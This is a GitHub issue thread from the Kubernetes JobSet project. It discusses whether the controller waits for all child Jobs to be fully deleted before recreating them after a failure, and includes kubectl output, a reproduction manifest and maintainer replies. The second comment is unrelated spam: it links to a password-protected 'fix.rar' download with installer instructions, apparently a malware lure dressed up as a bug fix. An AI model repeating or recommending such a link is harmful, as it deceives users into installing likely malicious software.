ForegroundDeletion of Jobs is not always enforced before recreation #665

nstogner · 2024-08-26T17:25:42Z

What happened:

I noticed this issue when I was testing what would happen if I were to trigger a failure in a Job when multiple .replicatedJobs[] are specified.

And observed that the JobSet controller did not wait for all Jobs to be deleted before creating a new one.

k get jobs -w -o custom-columns=NAME:.metadata.name,UID:.metadata.uid,CREATION_TIME:.metadata.creationTimestamp
NAME                            UID                                    CREATION_TIME
coordinator-example-workers-0   7ed23398-a07b-4a4d-9f72-a14c082567e9   2024-08-26T16:04:13Z
coordinator-example-driver-0    464b7733-9a37-4847-ac12-26be2468bf25   2024-08-26T16:04:13Z
coordinator-example-driver-0    464b7733-9a37-4847-ac12-26be2468bf25   2024-08-26T16:04:13Z
coordinator-example-workers-0   7ed23398-a07b-4a4d-9f72-a14c082567e9   2024-08-26T16:04:13Z
coordinator-example-driver-0    464b7733-9a37-4847-ac12-26be2468bf25   2024-08-26T16:04:13Z
coordinator-example-workers-0   7ed23398-a07b-4a4d-9f72-a14c082567e9   2024-08-26T16:04:13Z
coordinator-example-workers-0   7ed23398-a07b-4a4d-9f72-a14c082567e9   2024-08-26T16:04:13Z
coordinator-example-workers-0   7ed23398-a07b-4a4d-9f72-a14c082567e9   2024-08-26T16:04:13Z
coordinator-example-driver-0    464b7733-9a37-4847-ac12-26be2468bf25   2024-08-26T16:04:13Z
coordinator-example-driver-0    464b7733-9a37-4847-ac12-26be2468bf25   2024-08-26T16:04:13Z
coordinator-example-workers-0   7ed23398-a07b-4a4d-9f72-a14c082567e9   2024-08-26T16:04:13Z
# NEW workers-0 Job created HERE (notice new UID)
coordinator-example-workers-0   fa59cbba-37a4-4152-8d94-af6837f19e9b   2024-08-26T16:04:20Z
coordinator-example-workers-0   fa59cbba-37a4-4152-8d94-af6837f19e9b   2024-08-26T16:04:20Z
coordinator-example-workers-0   fa59cbba-37a4-4152-8d94-af6837f19e9b   2024-08-26T16:04:20Z
coordinator-example-workers-0   fa59cbba-37a4-4152-8d94-af6837f19e9b   2024-08-26T16:04:20Z
coordinator-example-workers-0   fa59cbba-37a4-4152-8d94-af6837f19e9b   2024-08-26T16:04:20Z
coordinator-example-workers-0   fa59cbba-37a4-4152-8d94-af6837f19e9b   2024-08-26T16:04:20Z
coordinator-example-workers-0   11a96b99-1301-4851-a7d1-003fb0c8d773   2024-08-26T16:04:28Z
coordinator-example-workers-0   11a96b99-1301-4851-a7d1-003fb0c8d773   2024-08-26T16:04:28Z
coordinator-example-workers-0   11a96b99-1301-4851-a7d1-003fb0c8d773   2024-08-26T16:04:28Z
coordinator-example-workers-0   11a96b99-1301-4851-a7d1-003fb0c8d773   2024-08-26T16:04:28Z
# Notice that driver-0 still exists (notice same UID)
coordinator-example-driver-0    464b7733-9a37-4847-ac12-26be2468bf25   2024-08-26T16:04:13Z

What you expected to happen:

I expected all Jobs from a given attempt to be fully deleted with ForegroundDeletion before any new Jobs are recreated.

How to reproduce it (as minimally and precisely as possible):

I used this manifest:

apiVersion: jobset.x-k8s.io/v1alpha2
kind: JobSet
metadata:
  name: coordinator-example
spec:
  # label and annotate jobs and pods with stable network endpoint of the designated
  # coordinator pod:
  # jobset.sigs.k8s.io/coordinator=coordinator-example-driver-0-0.coordinator-example
  failurePolicy:
    maxRestarts: 2 
  coordinator:
    replicatedJob: driver
    jobIndex: 0
    podIndex: 0
  replicatedJobs:
  - name: workers
    template:
      spec:
        parallelism: 4
        completions: 4
        backoffLimit: 0
        template:
          spec:
            containers:
            - name: sleep
              image: busybox
              command: 
                - bash
              args:
                - "-c"
                - "sleep 500 && exit 1"
  - name: driver
    template:
      spec:
        parallelism: 1
        completions: 1
        backoffLimit: 0
        template:
          spec:
            containers:
            - name: sleep
              image: busybox
              command: 
                - sleep
              args:
                - 100s

Anything else we need to know?:

Environment:

Kubernetes version (use kubectl version):

Client Version: v1.29.6
Kustomize Version: v5.0.4-0.20230601165947-6ce0bf390ce3
Server Version: v1.29.2

JobSet version (use git describe --tags --dirty --always): v0.6.0
Cloud provider or hardware configuration: kind (with podman)
Install tools: kubectl apply
Others: I was also chewing a piece of gum while I was running the commands above.

The text was updated successfully, but these errors were encountered:

dseynhae · 2024-08-26T17:25:47Z

Download
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

nstogner · 2024-08-26T17:28:32Z

Assuming the culprit is another call to Reconcile() that then notices that .metadata.deletionTimestamp is already set and skips the blocking call to foreground delete the given Job:

jobset/pkg/controllers/jobset_controller.go

Line 560 in 2dcc751

if targetJob.DeletionTimestamp != nil {

I think the fix would be to just remove this conditional.

kannon92 · 2024-08-29T12:09:36Z

Hey! Would you be open to creating an e2e test and see if your suggestion fixes it?

kannon92 · 2024-08-29T12:12:35Z

Actually reading about Foreground deletion, it seems that it is not a blocking call to delete. It sets a finalized and then JobSet would recreate.

So I’m not sure this is a bug tbh.

Sounds like you want to only recreate the jobs once they are fully deleted. Jobs can take a long time to be deleted especially id the pods have graceful termination.

I think this is really a feature request.

nstogner · 2024-08-29T17:44:44Z

From the GH Issue that specified foreground deletion it appears that the expected behavior is to block until all Pods are gone (otherwise bad things): #392

nstogner · 2024-08-29T17:45:11Z

Hey! Would you be open to creating an e2e test and see if your suggestion fixes it?

Yes, I should be able to do that

kannon92 · 2024-09-04T13:59:17Z

@ahg-g WDYT of #665 (comment)?

Reading the documentation on ForegroundDeletion, I don't understand how that becomes a blocking delete call.

ahg-g · 2024-09-05T01:08:48Z

Foreground will keep the child job around with deletionTimestamp set until all its pods are deleted. This will prevent JobSet from creating a replacement for the child job until all the pods are deleted. So this is working as expected.

@nstogner why do you want jobset to wait until all child jobs are deleted before creating their replacements?

danielvegamyhre · 2024-10-05T17:44:50Z

And observed that the JobSet controller did not wait for all Jobs to be deleted before creating a new one.

@nstogner this is not the intended behavior - as Abdullah mentioned above, the intended behavior is each Job will not be recreated until the prior iteration of that Job has been completed cleaned up (all pods and parent Job object removed from etcd). It doesn't wait for all Jobs to be deleted before recreating any Job.

Closing this for now since there's been no activity for ~1 month, feel free to reopen if you want to continue the discussion.

thebinaryone1 · 2024-10-18T00:37:15Z

I am observing overlap of pods between two consecutive restart attempts. A straggler pod from restart-attempt N-1 will try to connect to the a new incarnation of a pod in restart-attempt N.

So pretty sure the clean up is not happening fully before the new set of Jobs/pods are created.

ahg-g · 2024-10-18T02:16:30Z

So pretty sure the clean up is not happening fully before the new set of Jobs/pods are created.

Yes, the intent is not to clean up all jobs before starting to create the replacements. The behavior is to recreate child jobs in parallel to facilitate quick restart.

If we want to block on the recreation until all jobs are deleted, then this is a new FailurePolicy feature, we can call it BlockingRestart

nstogner added the kind/bug Categorizes issue or PR as related to a bug. label Aug 26, 2024

nstogner changed the title ~~ForegroundDeletion of Jobs is not enforced upon re-Reconcile()~~ ForegroundDeletion of Jobs is not always enforced before recreation Aug 26, 2024

danielvegamyhre closed this as completed Oct 5, 2024

danielvegamyhre mentioned this issue Oct 19, 2024

Add restart strategy #686

Merged

nstogner mentioned this issue Oct 22, 2024

Blocking restart behavior #684

Closed

3 tasks

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

ForegroundDeletion of Jobs is not always enforced before recreation #665

ForegroundDeletion of Jobs is not always enforced before recreation #665

nstogner commented Aug 26, 2024

dseynhae commented Aug 26, 2024

nstogner commented Aug 26, 2024

kannon92 commented Aug 29, 2024

kannon92 commented Aug 29, 2024

nstogner commented Aug 29, 2024

nstogner commented Aug 29, 2024

kannon92 commented Sep 4, 2024

ahg-g commented Sep 5, 2024

danielvegamyhre commented Oct 5, 2024

thebinaryone1 commented Oct 18, 2024

ahg-g commented Oct 18, 2024

ForegroundDeletion of Jobs is not always enforced before recreation #665

ForegroundDeletion of Jobs is not always enforced before recreation #665

Comments

nstogner commented Aug 26, 2024

dseynhae commented Aug 26, 2024

nstogner commented Aug 26, 2024

kannon92 commented Aug 29, 2024

kannon92 commented Aug 29, 2024

nstogner commented Aug 29, 2024

nstogner commented Aug 29, 2024

kannon92 commented Sep 4, 2024

ahg-g commented Sep 5, 2024

danielvegamyhre commented Oct 5, 2024

thebinaryone1 commented Oct 18, 2024

ahg-g commented Oct 18, 2024